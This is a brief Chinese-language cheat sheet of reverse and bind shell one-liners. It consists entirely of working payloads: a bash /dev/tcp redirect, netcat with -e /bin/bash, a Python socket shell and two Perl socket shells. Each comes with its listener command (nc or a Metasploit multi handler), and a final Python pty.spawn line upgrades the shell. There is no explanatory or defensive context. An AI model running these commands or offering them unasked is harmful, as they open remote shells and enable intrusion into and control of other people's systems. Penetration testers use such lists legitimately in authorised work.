===
bash

无交互（反向）
监听机：nc -nlvp [监听端口号] / 或者MSF multi handler
目标机：bash -i >& /dev/tcp/[ip]/[监听机端口号] >&1 或者 bash -i >& /dev/tcp/[ip]/[监听机端口号] 0>&1
或者
nc -e /bin/bash [ip] [监听机端口号]
（正向弹shell）
监听机：nc [ip] [端口] / 或者MSF multi handler
目标机：nc -lvp [端口] -e /bin/bash

===
python反弹shell

有交互
监听机：nc -nlvp [监听端口号] / 或者MSF multi handler
目标机：python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("[ip]",[监听端口号]]));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

===
perl反弹shell

监听机：nc -nlvp [监听端口号] / 或者MSF multi handler
目标机：perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"IP地址:端口号");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
或者
perl -e 'use Socket;$i="ip地址";$p=端口号;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'
===

python -c 'import pty; pty.spawn("/bin/bash");'